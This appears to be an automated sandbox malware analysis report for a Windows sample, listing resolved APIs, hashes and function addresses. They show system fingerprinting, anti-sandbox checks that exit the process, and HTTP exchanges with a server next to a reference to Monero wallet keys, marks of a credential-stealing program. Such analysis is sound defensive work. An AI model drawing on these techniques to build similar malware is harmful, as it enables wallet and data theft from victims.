                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: 0dd9cc19555f8dae7ad65257a430dbd4f9fc55d47c60c00ce2866589c4a965a1
                                        • Instruction ID: 52046e943e2fb820a4a303393d8f8288c9784df0c9cc6f31895daefca7c87cc9
                                        • Opcode Fuzzy Hash: 0dd9cc19555f8dae7ad65257a430dbd4f9fc55d47c60c00ce2866589c4a965a1
                                        • Instruction Fuzzy Hash: 90719FB1A0025CABDB14DFA1DC49FEE7774BB44304F10819AF60A6B1D4DBB86A84CF59

                                        Control-flow Graph (image not reproduced; blocks marked Executed / Not Executed) for the function at 004F7690, whose blocks call GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004F76D2
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004F770F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F7793
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F779A
                                        • wsprintfA.USER32 ref: 004F77D0
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: cd683661083a60c87372f23c70b40e2a289950e911d7361bb92cceb4eb28ccb6
                                        • Instruction ID: f27afa54df4b2d0e7ea002f7fec53e40266aa35cf25e64beddf885f962f8cfb8
                                        • Opcode Fuzzy Hash: cd683661083a60c87372f23c70b40e2a289950e911d7361bb92cceb4eb28ccb6
                                        • Instruction Fuzzy Hash: 7D4154B1D0425C9BDF10DB94DC85FEEB7B8AB48704F104199F609AB280D77CAA44CBA9
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004E11B7), ref: 004F7A10
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7A17
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 004F7A2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: 4a0a563ea26782bc450b8e60dcce985c55abe6d29a7248019c2a932ef54084e3
                                        • Instruction ID: d7a8cb70825519e9532cba87c500ee2e3a4ae11575a8dd3fdb61da64dd9c0de6
                                        • Opcode Fuzzy Hash: 4a0a563ea26782bc450b8e60dcce985c55abe6d29a7248019c2a932ef54084e3
                                        • Instruction Fuzzy Hash: 96F04FB1D48609EBCB04DF98DD45FAEBBB8FB45711F10421AF615A2780C7795500CBA5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 3f4b10bee990563b3817c78f7aebb62536f6c4ad99143573b77f116fbef9b3d2
                                        • Instruction ID: 728185f6076ce34483ac7dad8b1fc19288144c2f6334024d7391c5c6a9394881
                                        • Opcode Fuzzy Hash: 3f4b10bee990563b3817c78f7aebb62536f6c4ad99143573b77f116fbef9b3d2
                                        • Instruction Fuzzy Hash: 0DD05E7490430C9BCB04DFE49949ADDBB78BB8C216F000655D90572240EA345441CA79

                                        Control-flow Graph (image not reproduced; blocks marked Executed / Not Executed) for the API-resolution function at 004F9F20, whose blocks make 8 LoadLibraryA calls and 104 GetProcAddress calls
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,01445710), ref: 004F9F3D
                                        • GetProcAddress.KERNEL32(74DD0000,01445730), ref: 004F9F55
                                        • GetProcAddress.KERNEL32(74DD0000,01459610), ref: 004F9F6E
                                        • GetProcAddress.KERNEL32(74DD0000,014595B0), ref: 004F9F86
                                        • GetProcAddress.KERNEL32(74DD0000,014595C8), ref: 004F9F9E
                                        • GetProcAddress.KERNEL32(74DD0000,014595E0), ref: 004F9FB7
                                        • GetProcAddress.KERNEL32(74DD0000,0144B980), ref: 004F9FCF
                                        • GetProcAddress.KERNEL32(74DD0000,0145CFE8), ref: 004F9FE7
                                        • GetProcAddress.KERNEL32(74DD0000,0145D048), ref: 004FA000
                                        • GetProcAddress.KERNEL32(74DD0000,0145CE68), ref: 004FA018
                                        • GetProcAddress.KERNEL32(74DD0000,0145CF28), ref: 004FA030
                                        • GetProcAddress.KERNEL32(74DD0000,01445970), ref: 004FA049
                                        • GetProcAddress.KERNEL32(74DD0000,014457D0), ref: 004FA061
                                        • GetProcAddress.KERNEL32(74DD0000,01445750), ref: 004FA079
                                        • GetProcAddress.KERNEL32(74DD0000,01445770), ref: 004FA092
                                        • GetProcAddress.KERNEL32(74DD0000,0145CF40), ref: 004FA0AA
                                        • GetProcAddress.KERNEL32(74DD0000,0145D030), ref: 004FA0C2
                                        • GetProcAddress.KERNEL32(74DD0000,0144BC00), ref: 004FA0DB
                                        • GetProcAddress.KERNEL32(74DD0000,01445810), ref: 004FA0F3
                                        • GetProcAddress.KERNEL32(74DD0000,0145CF88), ref: 004FA10B
                                        • GetProcAddress.KERNEL32(74DD0000,0145CE20), ref: 004FA124
                                        • GetProcAddress.KERNEL32(74DD0000,0145CEC8), ref: 004FA13C
                                        • GetProcAddress.KERNEL32(74DD0000,0145CE50), ref: 004FA154
                                        • GetProcAddress.KERNEL32(74DD0000,01445990), ref: 004FA16D
                                        • GetProcAddress.KERNEL32(74DD0000,0145CF58), ref: 004FA185
                                        • GetProcAddress.KERNEL32(74DD0000,0145CE38), ref: 004FA19D
                                        • GetProcAddress.KERNEL32(74DD0000,0145CF70), ref: 004FA1B6
                                        • GetProcAddress.KERNEL32(74DD0000,0145D060), ref: 004FA1CE
                                        • GetProcAddress.KERNEL32(74DD0000,0145CE80), ref: 004FA1E6
                                        • GetProcAddress.KERNEL32(74DD0000,0145D078), ref: 004FA1FF
                                        • GetProcAddress.KERNEL32(74DD0000,0145CEE0), ref: 004FA217
                                        • GetProcAddress.KERNEL32(74DD0000,0145CFB8), ref: 004FA22F
                                        • GetProcAddress.KERNEL32(74DD0000,0145D090), ref: 004FA248
                                        • GetProcAddress.KERNEL32(74DD0000,0145A1F0), ref: 004FA260
                                        • GetProcAddress.KERNEL32(74DD0000,0145CDF0), ref: 004FA278
                                        • GetProcAddress.KERNEL32(74DD0000,0145CFA0), ref: 004FA291
                                        • GetProcAddress.KERNEL32(74DD0000,014459B0), ref: 004FA2A9
                                        • GetProcAddress.KERNEL32(74DD0000,0145CF10), ref: 004FA2C1
                                        • GetProcAddress.KERNEL32(74DD0000,014452D0), ref: 004FA2DA
                                        • GetProcAddress.KERNEL32(74DD0000,0145CE98), ref: 004FA2F2
                                        • GetProcAddress.KERNEL32(74DD0000,0145CFD0), ref: 004FA30A
                                        • GetProcAddress.KERNEL32(74DD0000,014455B0), ref: 004FA323
                                        • GetProcAddress.KERNEL32(74DD0000,01445270), ref: 004FA33B
                                        • LoadLibraryA.KERNEL32(0145D000,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA34D
                                        • LoadLibraryA.KERNEL32(0145D0A8,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA35E
                                        • LoadLibraryA.KERNEL32(0145CE08,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA370
                                        • LoadLibraryA.KERNEL32(0145CEB0,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA382
                                        • LoadLibraryA.KERNEL32(0145D0C0,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA393
                                        • LoadLibraryA.KERNEL32(0145D018,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA3A5
                                        • LoadLibraryA.KERNEL32(0145CEF8,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA3B7
                                        • LoadLibraryA.KERNEL32(0145CDD8,?,004F5EF3,00500AEB,?,?,?,?,?,?,?,?,?,?,00500AEA,00500AE7), ref: 004FA3C8
                                        • GetProcAddress.KERNEL32(75290000,01445470), ref: 004FA3EA
                                        • GetProcAddress.KERNEL32(75290000,0145D198), ref: 004FA402
                                        • GetProcAddress.KERNEL32(75290000,014591B0), ref: 004FA41A
                                        • GetProcAddress.KERNEL32(75290000,0145D120), ref: 004FA433
                                        • GetProcAddress.KERNEL32(75290000,01445290), ref: 004FA44B
                                        • GetProcAddress.KERNEL32(73440000,0144B890), ref: 004FA470
                                        • GetProcAddress.KERNEL32(73440000,01445590), ref: 004FA489
                                        • GetProcAddress.KERNEL32(73440000,0144B908), ref: 004FA4A1
                                        • GetProcAddress.KERNEL32(73440000,0145D108), ref: 004FA4B9
                                        • GetProcAddress.KERNEL32(73440000,0145D2E8), ref: 004FA4D2
                                        • GetProcAddress.KERNEL32(73440000,01445230), ref: 004FA4EA
                                        • GetProcAddress.KERNEL32(73440000,014453F0), ref: 004FA502
                                        • GetProcAddress.KERNEL32(73440000,0145D378), ref: 004FA51B
                                        • GetProcAddress.KERNEL32(752C0000,014454D0), ref: 004FA53C
                                        • GetProcAddress.KERNEL32(752C0000,014452B0), ref: 004FA554
                                        • GetProcAddress.KERNEL32(752C0000,0145D300), ref: 004FA56D
                                        • GetProcAddress.KERNEL32(752C0000,0145D360), ref: 004FA585
                                        • GetProcAddress.KERNEL32(752C0000,01445250), ref: 004FA59D
                                        • GetProcAddress.KERNEL32(74EC0000,0144B9A8), ref: 004FA5C3
                                        • GetProcAddress.KERNEL32(74EC0000,0144B9D0), ref: 004FA5DB
                                        • GetProcAddress.KERNEL32(74EC0000,0145D318), ref: 004FA5F3
                                        • GetProcAddress.KERNEL32(74EC0000,014452F0), ref: 004FA60C
                                        • GetProcAddress.KERNEL32(74EC0000,01445310), ref: 004FA624
                                        • GetProcAddress.KERNEL32(74EC0000,0144BA20), ref: 004FA63C
                                        • GetProcAddress.KERNEL32(75BD0000,0145D138), ref: 004FA662
                                        • GetProcAddress.KERNEL32(75BD0000,01445450), ref: 004FA67A
                                        • GetProcAddress.KERNEL32(75BD0000,01459090), ref: 004FA692
                                        • GetProcAddress.KERNEL32(75BD0000,0145D1F8), ref: 004FA6AB
                                        • GetProcAddress.KERNEL32(75BD0000,0145D3C0), ref: 004FA6C3
                                        • GetProcAddress.KERNEL32(75BD0000,01445350), ref: 004FA6DB
                                        • GetProcAddress.KERNEL32(75BD0000,014454B0), ref: 004FA6F4
                                        • GetProcAddress.KERNEL32(75BD0000,0145D390), ref: 004FA70C
                                        • GetProcAddress.KERNEL32(75BD0000,0145D348), ref: 004FA724
                                        • GetProcAddress.KERNEL32(75A70000,01445330), ref: 004FA746
                                        • GetProcAddress.KERNEL32(75A70000,0145D288), ref: 004FA75E
                                        • GetProcAddress.KERNEL32(75A70000,0145D2A0), ref: 004FA776
                                        • GetProcAddress.KERNEL32(75A70000,0145D258), ref: 004FA78F
                                        • GetProcAddress.KERNEL32(75A70000,0145D1E0), ref: 004FA7A7
                                        • GetProcAddress.KERNEL32(75450000,014455D0), ref: 004FA7C8
                                        • GetProcAddress.KERNEL32(75450000,014453B0), ref: 004FA7E1
                                        • GetProcAddress.KERNEL32(75DA0000,01445410), ref: 004FA802
                                        • GetProcAddress.KERNEL32(75DA0000,0145D168), ref: 004FA81A
                                        • GetProcAddress.KERNEL32(6F070000,01445370), ref: 004FA840
                                        • GetProcAddress.KERNEL32(6F070000,01445390), ref: 004FA858
                                        • GetProcAddress.KERNEL32(6F070000,014453D0), ref: 004FA870
                                        • GetProcAddress.KERNEL32(6F070000,0145D150), ref: 004FA889
                                        • GetProcAddress.KERNEL32(6F070000,01445430), ref: 004FA8A1
                                        • GetProcAddress.KERNEL32(6F070000,01445490), ref: 004FA8B9
                                        • GetProcAddress.KERNEL32(6F070000,014454F0), ref: 004FA8D2
                                        • GetProcAddress.KERNEL32(6F070000,01445510), ref: 004FA8EA
                                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004FA901
                                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 004FA917
                                        • GetProcAddress.KERNEL32(75AF0000,0145D210), ref: 004FA939
                                        • GetProcAddress.KERNEL32(75AF0000,014591D0), ref: 004FA951
                                        • GetProcAddress.KERNEL32(75AF0000,0145D330), ref: 004FA969
                                        • GetProcAddress.KERNEL32(75AF0000,0145D180), ref: 004FA982
                                        • GetProcAddress.KERNEL32(75D90000,01445530), ref: 004FA9A3
                                        • GetProcAddress.KERNEL32(6CFC0000,0145D2B8), ref: 004FA9C4
                                        • GetProcAddress.KERNEL32(6CFC0000,01445550), ref: 004FA9DD
                                        • GetProcAddress.KERNEL32(6CFC0000,0145D1B0), ref: 004FA9F5
                                        • GetProcAddress.KERNEL32(6CFC0000,0145D3A8), ref: 004FAA0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: aa0b7220340a3da2c2379b8d8ee91f217347e71a6e0b70759606eda604194bd2
                                        • Instruction ID: 9dbe51c0d546eba3ecea04c3eda08db690e8fee53f672857de341963c38ddab3
                                        • Opcode Fuzzy Hash: aa0b7220340a3da2c2379b8d8ee91f217347e71a6e0b70759606eda604194bd2
                                        • Instruction Fuzzy Hash: 8C62EDB56181089FC748DFA8ED88F667BB9B7CD601710C71AFA09D32B0D63DA541CB68

                                        Control-flow Graph (legend: Executed / Not Executed): function 004E48D0, basic blocks 4E48D0-4E4FF2; graph rendered in the report. API calls on the graph: InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, lstrlen, HttpSendRequestA, InternetReadFile, InternetCloseHandle.
                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004E4889
                                          • Part of subcall function 004E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004E4899
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004E4965
                                        • StrCmpCA.SHLWAPI(?,0145E888), ref: 004E498A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004E4B0A
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00500DDE,00000000,?,?,00000000,?,",00000000,?,0145E918), ref: 004E4E38
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004E4E54
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004E4E68
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004E4E99
                                        • InternetCloseHandle.WININET(00000000), ref: 004E4EFD
                                        • InternetCloseHandle.WININET(00000000), ref: 004E4F15
                                        • HttpOpenRequestA.WININET(00000000,0145E908,?,0145E208,00000000,00000000,00400100,00000000), ref: 004E4B65
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • InternetCloseHandle.WININET(00000000), ref: 004E4F1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: d8739a689c47bfac3079790f351947aae6803c88caa32ef3332a0c6c988d5dbe
                                        • Instruction ID: fd3616689f2e976625299860f9974def74d1589aa1157c7313664cb0e269c62e
                                        • Opcode Fuzzy Hash: d8739a689c47bfac3079790f351947aae6803c88caa32ef3332a0c6c988d5dbe
                                        • Instruction Fuzzy Hash: 8C12EEB291011C9ACB14EB91DD66FFEB739BF54304F10419EB20A62091DF787B58CB6A

                                        Control-flow Graph (legend: Executed / Not Executed): function 004F5760, basic blocks 4F5760-4F5D16; graph rendered in the report. API calls on the graph: StrCmpCA (repeated), Sleep.
                                        APIs
                                          • Part of subcall function 004FAB30: lstrlen.KERNEL32(004E4F55,?,?,004E4F55,00500DDF), ref: 004FAB3B
                                          • Part of subcall function 004FAB30: lstrcpy.KERNEL32(00500DDF,00000000), ref: 004FAB95
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004F5894
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004F58F1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004F5AA7
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004F5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004F5478
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004F5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004F5568
                                          • Part of subcall function 004F5510: lstrlen.KERNEL32(00000000), ref: 004F557F
                                          • Part of subcall function 004F5510: StrStrA.SHLWAPI(00000000,00000000), ref: 004F55B4
                                          • Part of subcall function 004F5510: lstrlen.KERNEL32(00000000), ref: 004F55D3
                                          • Part of subcall function 004F5510: lstrlen.KERNEL32(00000000), ref: 004F55FE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004F59DB
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004F5B90
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004F5C5C
                                        • Sleep.KERNEL32(0000EA60), ref: 004F5C6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: 527c3931fc5216330ccf16e8c6baab911b66ab2067c71e40c9113e95059eb85b
                                        • Instruction ID: 002bd75e6ebe7adb21996d1a36b31eb6b65ccc10501656eb28a23febf25fc14d
                                        • Opcode Fuzzy Hash: 527c3931fc5216330ccf16e8c6baab911b66ab2067c71e40c9113e95059eb85b
                                        • Instruction Fuzzy Hash: 78E140B19101089BCB14FBA1DCA6EFD7739AF54304F40855EB70A56095EF3C6A1CCB5A

                                        Control-flow Graph (legend: Executed / Not Executed): function 004F19F0, basic blocks 4F19F0-4F1C1D; graph rendered in the report. API calls on the graph: StrCmpCA (repeated), ExitProcess.
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 004F1A15
                                        • ExitProcess.KERNEL32 ref: 004F1A21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: be48dbc725b2196a6f2b12591ed6e9657e1afc6dd8b9150520c9530468d22931
                                        • Instruction ID: 9f330bdcaee2a837e246a227dff2deeb200a95e3d7c337fe34e347d808e08556
                                        • Opcode Fuzzy Hash: be48dbc725b2196a6f2b12591ed6e9657e1afc6dd8b9150520c9530468d22931
                                        • Instruction Fuzzy Hash: DF514F75A0420DEBCB04DF94D984FBE77B9FF44304F10404AE606AB2A0E778E951DB6A

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,01452440), ref: 004F9BF1
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014521D0), ref: 004F9C0A
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,01452218), ref: 004F9C22
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014521A0), ref: 004F9C3A
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014522C0), ref: 004F9C53
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014590A0), ref: 004F9C6B
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014456F0), ref: 004F9C83
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,01445630), ref: 004F9C9C
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014521B8), ref: 004F9CB4
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014522F0), ref: 004F9CCC
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014521E8), ref: 004F9CE5
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,01452230), ref: 004F9CFD
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,01445850), ref: 004F9D15
                                          • Part of subcall function 004F9BB0: GetProcAddress.KERNEL32(74DD0000,014522A8), ref: 004F9D2E
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004E11D0: ExitProcess.KERNEL32 ref: 004E1211
                                          • Part of subcall function 004E1160: GetSystemInfo.KERNEL32(?), ref: 004E116A
                                          • Part of subcall function 004E1160: ExitProcess.KERNEL32 ref: 004E117E
                                          • Part of subcall function 004E1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004E112B
                                          • Part of subcall function 004E1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 004E1132
                                          • Part of subcall function 004E1110: ExitProcess.KERNEL32 ref: 004E1143
                                          • Part of subcall function 004E1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004E123E
